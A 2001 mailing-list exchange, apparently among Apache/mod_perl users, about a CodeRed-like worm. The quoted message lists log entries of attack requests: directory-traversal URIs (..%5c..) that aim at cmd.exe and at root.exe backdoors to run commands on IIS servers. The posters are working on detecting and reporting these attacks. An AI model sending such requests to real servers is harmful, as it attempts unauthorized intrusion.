Slashdot has a report on this now, looks like a similar worm to CodeRed,
but this one tries to hit "numerous" vulnerabilities, including backdoors
left open by CodeRed.
------------
Brian Nilsen
[EMAIL PROTECTED]
On Tue, 18 Sep 2001, Nick Tonkin wrote:
>
> Sorry for the off-topic post; there was a lot of discussion here of
> CodeRed and Reuven's module to report attempted attacks.
>
> Since this a.m. I have had hundreds of requests like:
>
> /scripts/root.exe?/c+dir
> /MSADC/root.exe?/c+dir
> /c/winnt/system32/cmd.exe?/c+dir
> /d/winnt/system32/cmd.exe?/c+dir
> /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
> /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
>
> etc.
>
> They seem to come in batches of a dozen or more with slight variations in
> the URI requested. I am thinking about adding support to CodeRed.pm (which
> should probably be renamed if so) to report these attacks via e-mail in
> the same way it does for CodeRed. Any interest in that? Or any info on
> these bogus requests?
>
> ~~~~~~~~~~~
> Nick Tonkin
>
>
